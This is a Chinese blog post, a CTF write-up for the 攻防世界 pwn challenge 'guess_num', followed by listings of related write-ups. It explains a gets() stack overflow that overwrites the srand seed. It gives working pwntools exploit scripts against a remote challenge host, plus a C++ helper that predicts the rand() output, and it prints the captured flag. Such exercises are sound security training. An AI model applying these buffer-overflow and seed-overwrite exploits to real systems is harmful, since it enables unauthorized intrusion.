攻防世界-guess_num

最新推荐文章于 2023-10-30 19:01:30 发布
最新推荐文章于 2023-10-30 19:01:30 发布
阅读量563 收藏 4
点赞数 1
分类专栏: Pwn-WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45771413/article/details/116045017
版权

查看保护

好家伙,不留活口(;´д`)ゞ

在这里插入图片描述

IDA

逻辑很简单,输入名字后,程序会生成一个随机数种子,然后循环10次以下操作:

输入一个数,这个数和本次随机循环数值除以6的余数+1是否相等,相等则跳转到函数 sub_C3E() ,这里面直接有 system(“cat flag”);

在这里插入图片描述

分析

10次随机数必不能每次都对,所以得想办法绕过随机数或者修改随机数种子,让其种子固定则其生成的随机数也固定。

本体最有可能栈溢出的地方就是gets,gets获取输入存到v7,进入v7看看有没有漏洞:
可以看到v7下面就是seed,相隔0x20(这里在后面写exp的时候粗心搞成十进制,不停报错……)而gets是识别到\00才结束读取,所以我们可以填满v7然后再修改seed的值。

注意,这里seed[2]看上去只有两个元素,但是它是unsigned int 四字节,可以填充四个

tips:rand()函数 产生的是伪随机数 依靠srand()来产生随机数 如果 srand的参数相同 那么rand产生的随机数相同

填充之后seed的值固定,我们获取其固定的随机数,然后再第二次输入时填入,即可跳转到 cat flag

在这里插入图片描述

EXP

求srand的随机数:(linux下g++编译)

#include<iostream>
using namespace std;
int main(){
    int num;
    srand(0x61616161);//aaaa的16进制
    for(int i=0;i<10;i++){
        num=rand()%6+1;
        cout<<num;
    }
    cout<<endl;
}

求得随机数:5646623622。用其挨个输入:

from pwn import *
p=remote('220.249.52.134',49483)
p.recvuntil("your name!")
#p.sendline('a'*0x20+'2222')#p64(1111))
#p.sendline('a'*0x20+'2'*4)
# 1111 num=['1','3','1','2','5','6','4','2','6','1']
#num=['1','5','3','4','5','6','2','5','2','2']
#5646623622
num=["5","6","4","6","6","2","3","6","2","2"]
for i in num:
    #p.recvuntil("Please input your guess number:")
    #p.sendline(num[i])
    p.sendlineafter("Please input your guess number:",i)# 二合一写法
p.interactive()

flag

flag!cyberpeace{e28f0340a7caeb0eb70957770af80ae9}

坑&填坑

1.输入部分exp中的’aaaa’换成’2’*4,结果报错(已用c++ 求出2222的随机数种子)疑惑

2.本题捣巧了,可以再本地用固定seed生成的固定伪随机数进行输入。这题的考点应该是libc库:

在python里面调用srand函数和rand函数时,可以引入C++库,
可以通过ldd来查看可执行程序的依赖库文件。
可惜以上是知识盲区ORZ

填坑:

glibc 和 libc 都是 Linux 下的 C 函数库。
libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。

查看可执行程序的依赖库文件:lbb 文件目录/文件名

找到后在exp里调用该库的目录:

libc = cdll.LoadLibrary(“库地址/库名”)

在这里插入图片描述

EXP

#coding=utf-8
from pwn import *
from ctypes import *
#context.log_level = 'debug'; #开启后可以看到输入过程
p=remote('220.249.52.134',49483)

# 在Linux里调用 c++库
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6") 

payload = "a" * 0x20 + p64(1)
p.recvuntil('Your name:')
p.sendline(payload)
libc.srand(1) #用固定种子 1 ,调用c库:在库名前+ libc.
for i in range(10):
	num = str(libc.rand()%6+1) 
	p.recvuntil('number:')
	p.sendline(num)
p.interactive()
攻防世界 guess_num
09-27 1132
1.题目 2.Ida反汇编 3.根据上图代码,分析基本流程。 流程:随机种子生成随机数,对比随机数和输入的数字,连续正确10次就成功。 初看好像不可能成功,怎么可能猜对随机数十次?其实srand生成的随机数是伪随机数。其实就是一个很长的数字字符串,然后根据种子定位到这个字符串某个点,然后每次生成随机数就读一个数字字符。也就是说,如果我们的种子是一样的,相同的随机次序我们得到的随机数是一样的。 于是,现在的问题变成了我们怎么得到程序的种子?或者我们是否可以修改程序的种子? 查看c源码.
攻防世界pwn-guess_num
a_silly_coder的博客
01-15 1712
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界guess_num
Rt1Text的博客
03-27 587
题目 一点信息:猜数字 虚拟机里checksec
[攻防世界]guess_num
逆向萌新的博客
06-01 794
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
攻防世界Guess-the-Number
qq_44301170的博客
11-05 689
攻防世界Guess-the-Number 题目链接: Guess-the-Number. 下载附件后是一个jar文件,解压一下得到一个class文件,用 jd-gui反汇编得到guess.class文件源码。 import java.math.BigInteger; public class guess { static String XOR(String _str_one, String _str_two) { BigInteger i1 = new BigInteger(_str_on
攻防世界Guess-the-Number
qq_48274326的博客
12-25 393
攻防世界Guess-the-Number import java.io.PrintStream; public class guess { static String XOR(String _str_one, String _str_two) { java.math.BigInteger i1 = new java.math.BigInteger(_str_one, 16); java.math.BigInteger i2 = new java.math.BigInteger(_s
攻防世界pwn【guess_num
SUOYE_GUANXING的博客
10-30 250
flag为:cyberpeace{08b9d2e122fdcc5cfd4c7955eb732ae1}看这里,一开始还以为是我输入一个数,可以看到它会回显的数字;0x30-0x10;需要0x20个字符来让它溢出;使用ida64打开;进入gets漏洞点看;
[攻防世界 pwn]——guess_num
Y_peak的博客
02-19 1401
[攻防世界 pwn]——guess_num15 [攻防世界 pwn]——level0 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中发现 我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20 用C语言写个小demo #include <stdio.h> #include <stdlib.h> int main() { int n, b;
攻防世界 - pwn - guess_num
qq726232111的博客
03-16 1142
A、程序分析 1、 分析程序发现连续输入密码正确10次即可获取flag 2、 gets(0,rbp-30h) srand(rbp-10h) 通过输入用户名可以覆盖srand的种子,srand rand为伪随机,种子一样时随机数相同 3、 ...
初学pwn-攻防世界(guess_num)
天柱的博客
08-28 1418
初学pwn-writeUp 攻防世界的第六题,guess_num。 从这个题目可以猜出来,是跟猜数字有关的题目。启动靶机。 使用nc链接远端,查看一下。 发现链接之后,首先是输出了欢迎界面,之后需要输入一个名字。输入完成之后就要求开始猜数字。但是要命的是,只能猜一次,猜错了就GG。没有办法,这条路行不通。 下载文件,cat一下,很明显,是一个ELF文件。放进ida里查看一下。 发现这里的逻辑,就是生成一个伪随机数,然后进行猜数字。可以看到在23行这里,给srand函数设置了一个种子,然后进入循环,生成随
攻防世界-guess_num-Writeup
SkYe's Blog
05-15 511
guess_num [collapse title=“展开查看详情” status=“false”] 考察点:利用栈溢出固定随机数 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int v4; // [rsp+4h] [rbp-3Ch] int i; // [rsp+8h] [rbp-38h] int v6; // [rsp+Ch] [rbp-34h] char v7; // [rsp+10h] [rbp-30h]
攻防世界新手区guess_num
qq_25044201的博客
12-22 212
老办法 稍微看了看 这十个数 你全要猜对才能获得flag,这几乎是不可能的 其中关键的 gets这里发生栈溢出,(距离为0x20个填充字符加上1)v8可以栈溢出覆盖到seed[0]从而使seed[0]为1,此时srand就是srand(1)为一个固定的序列,这样我们可以提前写出来rand的1-6中10个数(因为rand函数计算机并不是随机的,在调用rand()函数之前,可以使用srand()函数设置随机数种子,如果没有设置随机数种子,rand()函数在调用时,自动设计随机数种子为1。随机种子相同..
攻防世界 pwn 练习区 guess_num
ChaoYue_miku的博客
07-12 751
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 ** 0、下载附件,使用checksec查看保护情况和文件位数,尝试打开文件 ** 64位可执行文件,开启了canary,NX,PIE和部分RELRO保护 ** 1、使用IDA64 Pro打开文件 ** 查看main函数,是一个猜数游戏,通过srand()函数初始化rand()函数的初始值,seed[0]作为种子,然后进行10轮猜数,全部正确之后,执行sub_C3E()函数。 查看sub_C3E()函数: 执行后直接得到flag
攻防世界逆向 Guess-the-Number分析
yoyo_573的博客
09-26 610
使用java反编译软件查看源码 jd-gui 链接:https://pan.baidu.com/s/1oP-oHKwRS5WUNuOPTYmGzA 提取码:ddzg 看源码 定义了一个XRO函数,对str_one和str_two进行异或操作返回16进制字符串,得到的就是flag 转成python代码如下 str_one ='4b64ca12ace755516c178f72d05d7061' str_two ="ecd44646cfe5994ebeb35bf922e25dba" """ 1、int(x,ba
攻防世界-baby_web详解
最新发布
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值